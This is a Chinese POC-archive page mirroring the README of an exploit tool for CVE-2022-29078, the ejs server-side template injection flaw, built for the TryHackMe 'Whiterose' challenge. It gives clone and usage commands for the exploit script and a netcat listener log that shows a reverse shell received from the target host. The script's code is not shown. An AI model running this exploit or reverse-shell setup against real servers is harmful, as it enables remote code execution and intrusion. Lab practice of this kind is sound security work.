POC详情: e7c59e1824393d0314e79acfe22e09d8f93ed8cb

来源
https://github.com/l0n3m4n/CVE-2022-29078
关联漏洞
标题: Github ejs 代码注入漏洞 (CVE-2022-29078)
描述:Github ejs是嵌入式 JavaScript 模板。 ejs 3.1.6 版本存在代码注入漏洞,该漏洞源于 settings[view options][outputFunctionName] 中可以进行服务器端模板注入。 这被解析为内部选项,并使用任意 OS 命令(在模板编译时执行)覆盖 outputFunctionName 选项。
描述
Serverside Template Injection (SSTI) RCE - THM challenge "whiterose"
介绍
<h1 align="center">
  THM Challenge SSTI exploit  
</h2>

<p align="center">
    <img src="https://api.visitorbadge.io/api/visitors?path=https%3A%2F%2Fgithub.com%2Fl0n3m4n%2FCVE-2022-29078&label=Visitors&countColor=%2337d67a" />
    </a>
    <a href="https://www.facebook.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Facebook-%231877F2.svg?style=for-the-badge&logo=Facebook&logoColor=white" alt="Facebook">
    </a>
      <a href="https://www.twitter.com/l0n3m4n">
        <img src="https://img.shields.io/badge/Twitter-%23000000.svg?style=for-the-badge&logo=X&logoColor=white" alt="X">
    </a>
    <a href="https://medium.com/@l0n3m4n">
        <img src="https://img.shields.io/badge/Medium-12100E?style=for-the-badge&logo=medium&logoColor=white" alt="Medium">
    </a>
    <a href="https://www.python.org/">
    <img src="https://img.shields.io/badge/python-3670A0?style=for-the-badge&logo=python&logoColor=ffdd54" alt="Python">
    </a>
    <a href="https://www.kali.org/">
    <img src="https://img.shields.io/badge/Kali-268BEE?style=for-the-badge&logo=kalilinux&logoColor=white" alt="Kali">      
    </a>
</p>

<h1 align="center">
    <img src="whiterose.jpeg" alt="whiterose" style="display: block; margin: auto;" />
</h1>


## 📜 Description 
The ejs (aka Embedded JavaScript templates) package 3.1.6 for Node.js allows server-side template injection in settings[view options][outputFunctionName]. This is parsed as an internal option, and overwrites the outputFunctionName option with an arbitrary OS command (which is executed upon template compilation).

## 📚 Table of Contents
- 📜 [Description](#-description)
- 🛠️ [Installation](#-installation)
- 💁 [References](#-references)

## 🛠️ Installation and Usage
```bash
$ git clone https://github.com/l0n3m4n/CVE-2022-29078.git && pip install colorama && cd CVE-2022-29078
```
```bash
$ python3 CVE-2022-29078.py -h

  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose


usage: CVE-2022-29078.py [-h] -t TARGET -u USER -p PASSWORD

Send a crafted POST request with custom URL, username, and password.

options:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target URL (e.g., http://admin.cyprusbank.thm/settings)
  -u USER, --user USER  Username to send in the request
  -p PASSWORD, --password PASSWORD
                        Password to send in the request

Example: python3 exploit-ssti.py -t http://admin.cyprusbank.thm/settings -u user1 -p pa$$w0rd 
```

## Output
```bash
  _________ ____________________.___                      .__         .__  __   
 /   _____//   _____/\__    ___/|   | ____ ___  _________ |  |   ____ |__|/  |_ 
 \_____  \ \_____  \   |    |   |   |/ __ \|  \/  /\____ \|  |  /  _ \|  \   __|
 /        \/        \  |    |   |   \  ___/ >    < |  |_> >  |_(  <_> )  ||  |  
/_______  /_______  /  |____|   |___|\___  >__/\_ \|   __/|____/\____/|__||__|  
        \/        \/                     \/      \/|__|                                     
      Author: l0n3m4n | ID: CVE-2022-29078 | THM Challenges: Whiterose

[+] Payload delivered successfully. Awaiting reverse shell connection...
```
## Netcat listener
```bash
$ sudo rlwrap -cAr nc -lvnp 443                                   
[sudo] password for l0n3m4n: 
listening on [any] 443 ...
connect to [10.2.4.61] from (UNKNOWN) [10.10.145.199] 38020
bash: cannot set terminal process group (1233): Inappropriate ioctl for device
bash: no job control in this shell
web@cyprusbank:~/app$ 
```

## 💁 References
- https://github.com/mde/ejs/issues/720
- https://github.com/projectdiscovery/nuclei-templates/main/http/cves/2022/CVE-2022-29078.yaml
- https://github.com/mde/ejs/releases
- https://eslam.io/posts/ejs-server-side-template-injection-rce
- https://security.netapp.com/advisory/ntap-20220804-0001
文件快照

 [4.0K]  /data/pocs/e7c59e1824393d0314e79acfe22e09d8f93ed8cb
├── [3.7K]  CVE-2022-29078.py
├── [4.3K]  README.md
└── [ 31K]  whiterose.jpeg

0 directories, 3 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。